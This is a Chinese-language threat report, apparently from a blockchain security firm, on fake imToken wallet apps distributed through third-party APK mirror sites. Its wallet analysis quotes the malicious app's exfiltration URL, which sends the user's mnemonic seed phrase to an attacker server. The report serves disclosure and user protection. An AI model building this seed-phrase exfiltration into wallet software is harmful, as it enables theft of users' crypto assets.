By: 山 & 耀

背景

基于区块链技术的 Web3 正在驱动下一代技术革命，越来越多的人开始参与到这场加密浪潮中，但 Web3 与 Web2 是两个截然不同的世界。Web3 世界是一个充满着各种各样的机遇以及危险的黑暗森林，身处 Web3 世界中，钱包则是进入 Web3 世界的入口以及通行证。

当你通过钱包在 Web3 世界中探索体验诸多的区块链相关应用和网站的过程中，你会发现在一条公链上每个应用都是使用钱包 “登录”；这与我们传统意义上的 “登录” 不同，在 Web2 世界中，每个应用之间的账户不全是互通的。但在 Web3 的世界中，所有应用都是统一使用钱包去进行 “登录”，我们可以看到 “登录” 钱包时显示的不是 “Login with Wallet”，取而代之的是 “Connect Wallet”。而钱包是你在 Web3 世界中的唯一通行证。

俗话说高楼之下必有阴影，在如此火热的 Web3 世界里，钱包作为入口级应用，自然也被黑灰产业链盯上。

在 Android 环境下，由于很多手机不支持 Google Play 或者因为网络问题，很多人会从其他途径下载 Google Play 的应用，比如：apkcombo、apkpure 等第三方下载站，这些站点往往标榜自己 App 是从 Google Play 镜像下载的，但是其真实安全性如何呢？

网站分析

鉴于下载途径众多，我们今天以 apkcombo 为例看看，apkcombo 是一个第三方应用市场，它提供的应用据官方说大部分来源于其他正规应用商店，但事实是否真如官方所说呢？

我们先看下 apkcombo 的流量有多大：

据数据统计站点 similarweb 统计，apkcombo 站点：

全球排名：1,809

国家排名：7,370

品类排名：168

我们可以看到它的影响力和流量都非常大。

它默认提供了一款 chrome APK 下载插件，我们发现这款插件的用户数达到了 10 W+：

那么回到我们关注的 Web3 领域中钱包方向，用户如果从这里下载的钱包应用安全性如何？

我们拿知名的 imToken 钱包为例，其 Google Play 的正规下载途径为：

https://play.google.com/store/apps/details?id=im.token.app

由于很多手机不支持 Google Play 或者因为网络问题，很多人会从这里下载 Google Play 的应用。

而 apkcombo 镜像站的下载路径为：

https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现，apkcombo 提供的版本为 24.9.11，经由 imToken 确认后，这是一个并不存在的版本！证实这是目前市面上假 imToken 钱包最多的一个版本。

在编写本文时 imToken 钱包的最新版本为 2.11.3，此款钱包的版本号很高，显然是为了伪装成一个最新版本而设置的。

如下图，我们在 apkcombo 上发现，此假钱包版本显示下载量较大，此处的下载量应该是爬取的 Google Play 的下载量信息，安全起见，我们觉得有必要披露这个恶意 App 的来源，防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如：uptodown

下载地址：https://imtoken.br.uptodown.com/android

我们发现 uptodown 任意注册即可发布 App，这导致钓鱼的成本变得极低：

钱包分析

在之前我们已经分析过不少假钱包的案例，如：2021-11-24 我们披露：《慢雾：假钱包 App 已致上万人被盗，损失高达十三亿美元》，所以在此不再赘述。

我们仅对 apkcombo 提供版本为 24.9.11 这款假钱包进行分析，在开始界面创建钱包或导入钱包助记词时，虚假钱包会将助记词等信息发送到钓鱼网站的服务端去，如下图：

根据逆向 APK 代码和实际分析流量包发现，助记词发送方式：

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图，最早的 “api.funnel.rocks” 证书出现在 2022-06-03，也就是攻击开始的大概时间：

俗话说一图胜千言，最后我们画一个流程图：

总结

目前这种骗局活动不仅活跃，甚至有扩大范围的趋势，每天都有新的受害者受骗。用户作为安全体系最薄弱的环节，应时刻保持怀疑之心，增强安全意识与风险意识，当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证；如果你的钱包从上述镜像站下载，请第一时间转移资产并卸载该软件，必要时可通过官方验证通道核实。

同时，如需使用钱包，请务必认准以下主流钱包 App 官方网址：

1/imToken 钱包：https://token.im/
2/TokenPocket 钱包：https://www.tokenpocket.pro/
3/TronLink 钱包：https://www.tronlink.org/
4/比特派钱包：https://bitpie.com/
5/MetaMask 钱包：https://metamask.io/
6/Trust Wallet：https://trustwallet.com/

请持续关注慢雾安全团队，更多 Web3 安全风险分析与告警正在路上。

致谢：感谢在溯源过程中 imToken 官方提供的验证支持。

由于保密性和隐私性，本文只是冰山一角。慢雾在此建议，用户需加强对安全知识的了解，进一步强化甄别网络钓鱼攻击的能力等，避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》：https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md

慢雾科技作为一家行业领先的区块链安全公司，在安全审计方面深耕多年，安全审计不仅让用户安心，更是降低攻击发生的手段之一。其次，各家机构由于数据孤岛，难以关联识别出跨机构的洗钱团伙，给反洗钱工作带来巨大挑战。而作为项目方，及时拉黑阻断恶意地址的资金转移也是重中之重。MistTrack 反洗钱追踪系统积累了 2 亿多个地址标签，能够识别全球主流交易平台的各类钱包地址，包含 1 千多个地址实体、超 10 万个威胁情报数据和超 9 千万个风险地址，如有需要可联系我们接入 API。最后希望各方共同努力，一起让区块链生态更美好。

原文始发于微信公众号（慢雾科技）：慢雾：Web3 假钱包第三方源调查分析